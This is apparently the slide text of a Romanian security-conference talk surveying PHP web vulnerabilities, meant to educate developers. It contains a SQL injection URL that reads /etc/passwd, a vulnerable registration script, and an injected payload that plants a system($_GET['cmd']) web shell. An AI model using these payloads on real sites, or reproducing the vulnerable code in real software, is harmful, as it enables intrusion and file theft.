1. Analiza și evoluția vulnerabilităților web The analysis and evolution of web vulnerabilities Popescu Petre Alexandru @DEFCAMP sirgod

2. Introducere Vulnerabilitățile web au apărut odată cu apariția paginilor PHP. Încet-încet, odată cu evoluția PHP-ului, și vulnerabilitățile au evoluat. Au devenit din ce în ce mai multe și mai complexe. Industria securității s-a dezvoltat și ea astfel încât, în prezent, există numeroase oportunități de angajare pentru cei pasionați de acest aspect al securității IT. Prezentarea are scopul de a informa dezvoltatorii web de greșelile de programare pe care le pot face, erori care pot avea consecințe catastrofale în cazul unor companii mari. Prezentarea este bazată pe un vechi tutorial de al meu. Informații noi au fost adăugate, unele lucruri au fost modificate. Unele informații (exemple, cod etc) sunt preluate din scriptul PHP furnizat participanților la concursul WFC 02 (din soluția trimisă de mine). Analiza unei vulnerabilități web este împărțită în câteva secții: - exemplu de bază - unul sau mai multe exemple reale - una sau mai multe metode de protejare/evitare - evoluția (istorie) - informații adiționale

4. Text Editor (e.g. Notepad++)

5. custom php.ini

6. Cunoștințe PHP, HTML, MySQL, JavaScript

8. disabled_functions= N/A

9. register_globals= on

10. allow_url_include = on

11. allow_url_fopen = on

12. magic_quotes_gpc = off

13. short_tag_open = on

14. asp tags = on

15. file_uploads = on

17. are nevoie de condiții speciale în php.ini

18. allow_url_fopen

19. allow_url_include

20. vulnerabilitate cu grad de risc extrem de ridicat

21. funcții în PHP care permit includerea fișierelor

22. include

23. include_once

24. require

25. require_once

26. bypass

27. https, ftp etc.

29. switch()

31. vulnerabilitate cu grad de riscridicat

32. funcții în PHP care permit includerea fișierelor

33. include

34. include_once

35. require

36. require_once

37. bypass

38. ..%5C (Windows)

39. ..(Windows)

44. vulnerabilitate cu grad de riscmediu spre ridicat

45. funcții în PHP care permit citirea fișierelor

46. file_get_contents

47. readfile

48. file

49. fopen

50. highlight_file

51. show_source

52. bypass

53. ..%5C (Windows)

54. ..(Windows)

58. vulnerabilitate cu grad de riscmediu spre ridicat

59. SQL Injection poate fi realizat pe mai multe tipuri de baze date

60. MySQL

61. MSSQL

62. PostgreSQL

63. etc.

64. există mai multe tipuri de injecții

65. union based

66. error based

67. blind

69. http://127.0.0.1/test.php?id=1+union+all+select+1,2,load_file('etc/passwd'),4--

72. expresii regulate (validare alfanumerică)

73. mysql_real_escape_string

75. mărire privilegii (dacă sunt stocate în cookie)

76. vulnerabilitate cu grad de riscmediu spre ridicat

77. modificare variabile

78. direct din cookie (cookie editor)

80. funcții în PHP care ne permit executare de comenzi

81. exec

82. passthru

83. shell_exec

84. system

85. vulnerabilitate cu grad de risc foarteridicat

86. exec() nu arată outputul comenzii, dar ea este executată

89. Remote Command Execution Exemplu real: Complex $user=$_POST['user']; $pass1=$_POST['pass1']; $pass2=$_POST['pass2']; $email1=$_POST['email1']; $email2=$_POST['email2']; $location=$_POST['location']; $url=$_POST['url']; $filename="./sites/".$user.".php"; $html="<?php regdate = quot;$datequot;; user = quot;$userquot;; pass = quot;$pass1quot;; email = quot;$email1quot;; location = quot;$locationquot;; url = quot;$urlquot;; ?>"; $fp=fopen($filename,'a+'); fputs($fp,$html)ordie("Could not open file!");

90. Remote Command Execution Codul din fișierul creat $regdate="13 June 2009, 4:16 PM"; $user="pwned"; $pass="pwned"; $email="pwned@yahoo.com"; $location= “CODUL NOSTRU"; $url="http://google.ro"; Cod injectat quot;;?><?php system(_GET['cmd']);?><?php xxx=quot;:D

93. funcții în PHP care ne permit executare de cod

94. eval

95. vulnerabilitate cu grad de risc foarteridicat

100. funcții în PHP care afișează variabile

101. print

102. echo

103. die

104. exit

105. vulnerabilitate cu grad de risc mediu

106. metode de exploatare

107. cookie stealing

108. XSS worm

110. folosirea unor funcții PHP

111. htmlentities (cu sau fără ENT_QUOTES)

113. este de mai multe feluri

114. variabilă de login

115. control panel neprotejat

116. insecure cookie handling (prezentat anterior)

117. login bypass (SQL Injection) (prezentat anterior)

120. .htpasswd

122. acces la baza de date (backup)

123. acces la codul sursă (.inc)

126. requesturi simple (variabile GET, POST)

127. requesturi complexe (formulare)

128. requesturi cu fișiere

129. vulnerabilitate cu grad de risc mediu/ridicat

130. metode de a trece de tokenuri

131. via XSS

133. folosire CAPTCHA

135. poate fi realizat în mai multe moduri

136. este o vulnerabilitate cu grad de risc scăzut

140. folosirea silent (@) la incluziune

142. grad de risc variabil

143. CAPTCHA vulnerabile

144. salvare cod in COOKIE

145. dimensiuni ale imaginii generate manipulabile (DoS)

146. folosirea unui cod salvat TEXT în pagină

148. password reset

149. insecure “not-so-random” passwords